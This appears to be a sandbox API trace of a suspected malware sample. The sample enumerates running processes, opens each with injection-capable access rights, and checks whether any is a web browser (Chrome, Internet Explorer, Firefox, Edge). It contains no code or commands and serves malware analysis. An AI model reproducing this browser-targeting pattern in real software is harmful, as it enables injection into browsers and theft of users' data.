	[0247.532] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.532] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.532] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.532] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.533] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x9900
	[0247.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.533] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.534] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.534] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.534] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.534] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0247.535] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x9904
	[0247.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.535] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0247.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.536] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.536] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0247.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.536] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.537] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.537] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x9908
	[0247.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.537] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.538] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.538] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.538] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.539] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0247.539] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x990c
	[0247.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.540] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.540] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.540] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.541] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.541] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0247.543] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x9910
	[0247.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.543] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0247.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.543] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.543] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0247.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.544] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.544] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.545] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x9914
	[0247.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.545] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.545] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.546] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.546] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.546] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0247.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x9918
	[0247.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.547] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0247.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.548] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.548] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0247.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.548] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.549] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0247.550] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x991c
	[0247.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.550] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0247.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.551] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.551] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0247.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.551] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.551] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0247.552] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x9920
	[0247.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.552] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0247.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.553] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.553] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0247.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.553] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.553] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0247.554] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x9924
	[0247.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.554] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0247.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.554] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.555] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0247.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.555] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.555] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0247.556] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0247.556] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0247.558] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x9928
	[0247.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.558] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0247.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.559] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.559] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0247.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.560] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.560] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0247.561] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x992c
	[0247.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.561] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0247.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.561] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.562] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0247.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.562] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.562] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0247.563] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x9930
	[0247.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.563] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0247.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.563] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.564] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0247.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.564] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.564] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0247.565] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x9934
	[0247.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.565] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0247.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.565] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.566] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0247.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.566] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.573] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0247.574] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x9938
	[0247.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.574] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0247.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.575] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.575] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0247.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.576] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.576] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0247.577] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x993c
	[0247.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.577] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0247.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.577] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.578] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0247.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.578] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.578] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0247.579] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x9940
	[0247.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.579] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0247.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.579] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.580] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0247.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.580] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.581] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0247.582] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x9944
	[0247.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.582] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0247.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.582] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.583] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0247.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.583] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.584] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0247.584] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x9948
	[0247.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.585] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0247.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.585] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.585] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0247.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.586] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.586] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0247.587] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x994c
	[0247.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.587] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0247.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.587] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.587] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0247.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.588] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.588] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0247.590] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x9950
	[0247.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.590] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0247.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.590] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.591] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0247.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.592] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.592] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0247.593] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x9954
	[0247.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.593] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0247.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.593] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.594] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0247.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.595] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.595] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0247.596] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x9958
	[0247.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.596] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0247.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.596] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.597] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0247.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.597] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.598] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0247.598] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x995c
	[0247.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.599] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0247.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.599] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.600] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0247.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
